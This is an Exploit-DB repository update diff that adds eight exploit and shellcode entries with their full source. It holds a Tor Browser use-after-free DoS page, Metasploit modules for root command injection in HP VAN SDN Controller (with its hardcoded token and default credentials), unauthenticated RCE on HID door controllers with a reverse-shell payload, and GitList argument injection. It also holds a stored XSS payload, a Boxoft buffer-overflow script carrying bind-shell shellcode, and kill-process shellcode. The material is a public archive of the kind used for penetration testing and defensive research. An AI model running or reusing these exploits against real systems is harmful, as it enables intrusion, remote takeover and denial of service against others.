DB: 2018-07-10

8 changes to exploits/shellcodes

Tor Browser < 0.3.2.10 - Use After Free (PoC)

Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)
Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow
HP VAN SDN Controller - Root Command Injection (Metasploit)
HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)
GitList 0.6.0 - Argument Injection (Metasploit)

Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting

Linux/x86 - Kill Process Shellcode (20 bytes)

exploits/linux/dos/44994.html

@@ -0,0 +1,30 @@
+# Exploit Title: Tor Browser - Use After Free (PoC)
+# Date: 09.07.2018
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://www.torproject.org/ 
+# Software Link: https://www.torproject.org/download/download-easy.html.en
+# Version: Tor 0.3.2.x before 0.3.2.10
+# Tested on: Kali Linux
+# CVE : CVE-2018-0491
+
+#Run exploit, result DOS
+
+
+<!DOCTYPE html>
+<html>
+<title>veryhandsome jameel naboo</title>
+<body>
+<script>
+function send()
+{
+try { document.body.contentEditable = 'true'; } catch(e){}
+try { var e0 = document.createElement("frameset"); } catch(e){}
+try { document.body.appendChild(e0); } catch(e){}
+try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
+try {
+e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
+rder']='-4400000000';}, false); e0.focus();} catch(e){}
+try { e0.setAttribute('iframe'); } catch(e){}
+try { document.body.insertBefore(e0); } catch(e){}
+}
+send();</script></html>

exploits/linux/remote/44991.rb

@@ -0,0 +1,197 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  # server: grizzly/2.2.16
+  HttpFingerprint = {pattern: [/^grizzly/]}
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP VAN SDN Controller Root Command Injection',
+      'Description'    => %q{
+        This module exploits a hardcoded service token or default credentials
+        in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.
+
+        A root command injection was discovered in the uninstall action's name
+        parameter, obviating the need to use sudo for privilege escalation.
+
+        If the service token option TOKEN is blank, USERNAME and PASSWORD will
+        be used for authentication. An additional login request will be sent.
+      },
+      'Author'         => [
+        'Matt Bergin', # Vulnerability discovery and Python exploit
+        'wvu'          # Metasploit module and additional ~research~
+      ],
+      'References'     => [
+        ['EDB', '44951'],
+        ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt']
+      ],
+      'DisclosureDate' => 'Jun 25 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {'BadChars' => ' '}
+        ],
+        ['Linux Dropper',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Type'        => :linux_dropper
+        ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'RPORT' => 8081, 'SSL' => true}
+    ))
+
+    register_options([
+      OptString.new('TOKEN',    [false, 'Service token', 'AuroraSdnToken37']),
+      OptString.new('USERNAME', [false, 'Service username', 'sdn']),
+      OptString.new('PASSWORD', [false, 'Service password', 'skyline'])
+    ])
+
+    register_advanced_options([
+      OptString.new('PayloadName', [false, 'Payload name (random if unset)']),
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    checkcode = CheckCode::Safe
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => '/',
+      'headers' => {'X-Auth-Token' => auth_token},
+      'ctype'   => 'application/json',
+      'data'    => {'action' => 'uninstall'}.to_json
+    )
+
+    if res.nil?
+      checkcode = CheckCode::Unknown
+    elsif res && res.code == 400 && res.body.include?('Missing field: name')
+      checkcode = CheckCode::Appears
+    elsif res && res.code == 401 && res.body =~ /Missing|Invalid token/
+      checkcode = CheckCode::Safe
+    end
+
+    checkcode
+  end
+
+  def exploit
+    if [CheckCode::Safe, CheckCode::Unknown].include?(check)
+      if datastore['ForceExploit']
+        print_warning('ForceExploit set! Exploiting anyway!')
+      else
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
+    end
+
+    if target['Type'] == :unix_memory
+      print_status('Executing command payload')
+      execute_command(payload.encoded)
+      return
+    end
+
+    print_status('Uploading payload as fake .deb')
+    payload_path = upload_payload
+    renamed_path = payload_path.gsub(/\.deb$/, '')
+
+    register_file_for_cleanup(renamed_path)
+
+    print_status('Renaming payload and executing it')
+    execute_command(
+      "mv #{payload_path} #{renamed_path} && " \
+      "chmod +x #{renamed_path}"
+    )
+    execute_command(renamed_path)
+  end
+
+  def upload_payload
+    payload_name = datastore['PayloadName'] ?
+                   "#{datastore['PayloadName']}.deb" :
+                   "#{Rex::Text.rand_text_alphanumeric(8..42)}.deb"
+    payload_path = "/var/lib/sdn/uploads/#{payload_name}"
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => '/upload',
+      'headers' => {'Filename' => payload_name, 'X-Auth-Token' => auth_token},
+      'ctype'   => 'application/octet-stream',
+      'data'    => generate_payload_exe
+    )
+
+    unless res && res.code == 200 && res.body.include?('{ }')
+      fail_with(Failure::UnexpectedReply, "Failed to upload #{payload_path}")
+    end
+
+    print_good("Uploaded #{payload_path}")
+
+    payload_path
+  end
+
+  def execute_command(cmd)
+    # Argument injection in /opt/sdn/admin/uninstall-dpkg
+    injection = "--pre-invoke=#{cmd}"
+
+    # Ensure we don't undergo word splitting
+    injection = injection.gsub(/\s+/, '${IFS}')
+
+    print_status("Injecting dpkg -r #{injection}")
+
+    send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => '/',
+      'headers' => {'X-Auth-Token' => auth_token},
+      'ctype'   => 'application/json',
+      'data'    => {'action' => 'uninstall', 'name' => injection}.to_json
+    }, 1)
+  end
+
+  def auth_token
+    return @auth_token if @auth_token
+
+    token    = datastore['TOKEN']
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    if token && !token.empty?
+      print_status("Authenticating with service token #{token}")
+      @auth_token = token
+      return @auth_token
+    end
+
+    print_status("Authenticating with creds #{username}:#{password}")
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => '/sdn/ui/app/login',
+      'rport'     => 8443,
+      'vars_post' => {'username' => username, 'password' => password}
+    )
+
+    unless res && res.get_cookies.include?('X-Auth-Token')
+      print_error('Invalid username and/or password specified')
+      return
+    end
+
+    @auth_token = res.get_cookies_parsed['X-Auth-Token'].first
+    print_good("Retrieved auth token #{@auth_token}")
+
+    @auth_token
+  end
+
+end

exploits/linux/remote/44992.rb

@@ -0,0 +1,191 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'HID discoveryd command_blink_on Unauthenticated RCE',
+      'Description' => %q{
+        This module exploits an unauthenticated remote command execution
+        vulnerability in the discoveryd service exposed by HID VertX and Edge
+        door controllers.
+
+        This module was tested successfully on a HID Edge model EH400
+        with firmware version 2.3.1.603 (Build 04/23/2012).
+      },
+      'Author'      =>
+        [
+          'Ricky "HeadlessZeke" Lawshae', # Discovery
+          'coldfusion39', # VertXploit
+          'Brendan Coles' # Metasploit
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Arch'        => ARCH_ARMLE,
+      'Privileged'  => true,
+      'References'  =>
+        [
+          ['ZDI', '16-223'],
+          ['URL', 'https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/'],
+          ['URL', 'http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html'],
+          ['URL', 'https://exfil.co/2016/05/09/exploring-the-hid-eh400/'],
+          ['URL', 'https://github.com/lixmk/Concierge'],
+          ['URL', 'https://github.com/coldfusion39/VertXploit']
+        ],
+      'DisclosureDate'  => 'Mar 28 2016',
+      'DefaultOptions'  =>
+        {
+          'WfsDelay'          => 30,
+          'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp',
+          'CMDSTAGER::FLAVOR' => 'echo'
+        },
+      'Targets'         => [['Automatic', {}]],
+      'CmdStagerFlavor' => 'echo', # wget is available, however the wget command is too long
+      'DefaultTarget'   => 0))
+    register_options [ Opt::RPORT(4070) ]
+  end
+
+  def check
+    connect_udp
+    udp_sock.put 'discover;013;'
+    res = udp_sock.get(5)
+    disconnect_udp
+
+    if res.to_s.eql? ''
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    hid_res = parse_discovered_response res
+    if hid_res[:mac].eql? ''
+      vprint_error 'Malformed response'
+      return CheckCode::Safe
+    end
+
+    @mac = hid_res[:mac]
+
+    vprint_good "#{rhost}:#{rport} - HID discoveryd service detected"
+    vprint_line hid_res.to_s
+    report_service(
+      host: rhost,
+      mac: hid_res[:mac],
+      port: rport,
+      proto: 'udp',
+      name: 'hid-discoveryd',
+      info: hid_res
+    )
+
+    if hid_res[:version].to_s.eql? ''
+      vprint_error "#{rhost}:#{rport} - Could not determine device version"
+      return CheckCode::Detected
+    end
+
+    # Vulnerable version mappings from VertXploit
+    vuln = false
+    version = Gem::Version.new(hid_res[:version].to_s)
+    case hid_res[:model]
+    when 'E400'     # EDGEPlus
+      vuln = true if version <= Gem::Version.new('3.5.1.1483')
+    when 'EH400'    # EDGE EVO
+      vuln = true if version <= Gem::Version.new('3.5.1.1483')
+    when 'EHS400'   # EDGE EVO Solo
+      vuln = true if version <= Gem::Version.new('3.5.1.1483')
+    when 'ES400'    # EDGEPlus Solo
+      vuln = true if version <= Gem::Version.new('3.5.1.1483')
+    when 'V2-V1000' # VertX EVO
+      vuln = true if version <= Gem::Version.new('3.5.1.1483')
+    when 'V2-V2000' # VertX EVO
+      vuln = true if version <= Gem::Version.new('3.5.1.1483')
+    when 'V1000'    # VertX Legacy
+      vuln = true if version <= Gem::Version.new('2.2.7.568')
+    when 'V2000'    # VertX Legacy
+      vuln = true if version <= Gem::Version.new('2.2.7.568')
+    else
+      vprint_error "#{rhost}:#{rport} - Device model was not recognized"
+      return CheckCode::Detected
+    end
+
+    vuln ? CheckCode::Appears : CheckCode::Safe
+  end
+
+  def send_command(cmd)
+    connect_udp
+
+    # double escaping for echo -ne stager
+    encoded_cmd = cmd.gsub("\\", "\\\\\\")
+
+    # packet length (max 44)
+    len = '044'
+
+    # <num> of times to blink LED, if the device has a LED; else
+    # <num> second to beep (very loudly) if the device does not have a LED
+    num = -1 # no beep/blink ;)
+
+    # construct packet
+    req = ''
+    req << 'command_blink_on;'
+    req << "#{len};"
+    req << "#{@mac};"
+    req << "#{num}`#{encoded_cmd}`;"
+
+    # send packet
+    udp_sock.put req
+    res = udp_sock.get(5)
+    disconnect_udp
+
+    unless res.to_s.start_with? 'ack;'
+      fail_with Failure::UnexpectedReply, 'Malformed response'
+    end
+  end
+
+  def execute_command(cmd, opts)
+    # the protocol uses ';' as a separator,
+    # so we issue each system command separately.
+    # we're using the echo command stager which hex encodes the payload,
+    # so there's no risk of replacing any ';' characters in the payload data.
+    cmd.split(';').each do |c|
+      send_command c
+    end
+  end
+
+  def exploit
+    print_status "#{rhost}:#{rport} - Connecting to target"
+
+    check_code = check
+    unless check_code == CheckCode::Appears || check_code == CheckCode::Detected
+      fail_with Failure::Unknown, "#{rhost}:#{rport} - Target is not vulnerable"
+    end
+
+    # linemax is closer to 40,
+    # however we need to account for additinal double escaping
+    execute_cmdstager linemax: 30, :temp => '/tmp'
+  end
+
+  def parse_discovered_response(res)
+    info = {}
+
+    return unless res.start_with? 'discovered'
+
+    hid_res = res.split(';')
+    return unless hid_res.size == 9
+    return unless hid_res[0] == 'discovered'
+    return unless hid_res[1].to_i == res.length
+
+    {
+      :mac          => hid_res[2],
+      :name         => hid_res[3],
+      :ip           => hid_res[4],
+      # ?           => hid_res[5], # '1'
+      :model        => hid_res[6],
+      :version      => hid_res[7],
+      :version_date => hid_res[8]
+    }
+  end
+end

exploits/php/remote/44993.rb

@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "GitList v0.6.0 Argument Injection Vulnerability",
+      'Description'    => %q{
+        This module exploits an argument injection vulnerability in GitList v0.6.0.
+        The vulnerability arises from GitList improperly validating input using the php function
+        'escapeshellarg'.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Kacper Szurek', # EDB POC
+          'Shelby Pace'    # Metasploit Module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '44548' ],
+          [ 'URL', 'https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html']
+        ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'GitList v0.6.0', { } ]
+        ],
+      'Privileged'     => false,
+      'Payload'        => { 'BadChars' => '\'"' },
+      'DisclosureDate' => "Apr 26 2018",
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, '/gitlist/')
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     => uri
+    )
+
+    if res && res.code == 200 && /Powered by .*GitList 0\.6\.0/.match(res.body)
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
+    cmd = '--open-files-in-pager=php -r "eval(\\"'
+    cmd << payload.encoded
+    cmd << '\\");"'
+    send_request_cgi(
+      'method' => 'POST',
+      'uri'    => postUri,
+      'vars_post' => { 'query' => cmd }
+    )
+  end
+end

exploits/php/webapps/44988.txt

@@ -0,0 +1,32 @@
+######################
+# Author Information #
+######################
+Author : Ahmed Elhady Mohamed
+twitter : @Ahmed__ELhady
+Date : 01/07/2018
+########################
+# Software Information #
+########################
+Affected Software : SeoChecker Umbraco CMS Plug-in
+Version: version 1.9.2 
+Software website  : https://soetemansoftware.nl/seo-checker
+
+###############
+# Description #
+###############
+SeoChecker Umbraco CMS Plug-in version 1.9.2 is vulnerable to stored cross-site scripting vulnerability in two parameters 
+which are SEO title and SEO description HTML parameters fields. A low privilege authenticated user who can edit the SEO tab
+parameter value for any Ubmraco CMS content like an article will be able to inject a malicious code to execute arbitrary HTML
+and JS code in a user's browser session in the context of an affected site. so when a high privilege user tries to access/edit 
+the article content. the JS code will be executed. The vulnerabilities are tested on 1.9.2 version and Other versions may also be affected.
+
+
+#################
+# Exlpoit Steps #
+#################
+1- Access the application with a low privilege authenticated user
+2- Go to the SEO tab for any article
+3-Enter the following payload in SEO title and SEO description HTML parameters fields parameters 
+"><script>alert(123)</script>
+4- Access the article content page to edit and change contents value.  
+5- The JS code will be executed.

exploits/windows/local/44989.py

@@ -0,0 +1,55 @@
+# Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH)  
+# Date: 2018-07-08
+# Software Link: http://www.boxoft.com/wav-to-wma/
+# Software Version:1.0
+# Exploit Author: Achilles
+# Target: Windows 7 x64 
+# CVE:
+# Description: A  malicious .wav file cause this vulnerability. 
+# Category: Local Exploit
+
+buffer = "A" * 4132
+buffer+= "\x90\x90\xeb\x06" #jmp short 6
+buffer+= "\x34\x14\x40\x00" # pop pop retn
+buffer+= "\x90" * 20
+buffer+= ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" #Bind shellcode port 4444
+"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
+"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
+"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
+"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
+"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
+"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
+"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
+"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
+"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
+"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
+"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
+"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
+"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
+"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
+"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
+"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
+"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
+"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
+"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
+"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
+"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
+"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
+"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
+"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
+"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
+"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
+"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
+"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
+"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
+"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
+"\xc8\x28\x1b\xd5\x3f\x51")
+
+try:
+	f=open("Evil.wav","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

exploits/windows/remote/44987.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Stack-based buffer overflow in Activision Infinity Ward Call of Duty Modern Warfare 2
+# Date: 14-12-2017
+# Exploit Author: Maurice Heumann
+# Contact: https://twitter.com/momo5502?lang=en
+# Website: https://momo5502.com/
+# CVE: CVE-2018-10718
+# Category: webapps
+
+1. Description
+
+By sending a crafted network packet, it's possible construct a stack
+overflow in Call of Duty: Modern Warfare (amongst other versions).
+
+2. Proof of Concept
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44987.zip

files_exploits.csv

@@ -6012,6 +6012,7 @@ id,file,description,date,author,type,platform,port
 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
 44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
+44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9805,6 +9806,7 @@ id,file,description,date,author,type,platform,port
 44971,exploits/windows/local/44971.rb,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)",2018-07-03,Metasploit,local,windows,
 44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,
 44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
+44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16599,6 +16601,10 @@ id,file,description,date,author,type,platform,port
 44968,exploits/windows/remote/44968.rb,"FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
 44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
 44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
+44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
+44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
+44992,exploits/linux/remote/44992.rb,"HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
+44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39629,3 +39635,4 @@ id,file,description,date,author,type,platform,port
 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
 44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
+44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,

files_shellcodes.csv

@@ -893,3 +893,4 @@ id,file,description,date,author,type,platform
 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
+44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86

shellcodes/linux_x86/44990.c

@@ -0,0 +1,33 @@
+/*
+     Exploit Title: Kill PID shellcode
+     Date: 07/09/2018
+     Exploit Author: Nathu Nandwani
+     Platform: Linux/x86
+     Size: 20 bytes
+     Compile: gcc -fno-stack-protector -z execstack killproc.c -o killproc
+*/
+#include <string.h>
+#include <stdio.h>
+int main() 
+{
+	unsigned short pid = 2801;
+	
+	char shellcode[] = 
+	"\x31\xc0" /* xor eax, eax */
+	"\xb0\x25" /* mov al, 0x25 - SYS_KILL */
+	"\x89\xc3" /* mov ebx, eax */
+	"\x89\xc1" /* mov ecx, eax */
+	"\x66\xbb" /* mov bx, ? */
+	"\xF1\x0A" /* bx <= pid => 2801 = 0x0AF1 */
+	"\xb1\x09" /* mov cl, 0x09 - SIGKILL */
+	"\xcd\x80" /* int 0x80 */
+	"\xb0\x01" /* mov al, 0x01 */
+	"\xcd\x80"; /* int 0x80 */
+
+	shellcode[10] = pid & 0xff;
+	shellcode[11] = (pid >> 8) & 0xff;
+
+	printf("Shellcode length: %d\n", strlen(shellcode));
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}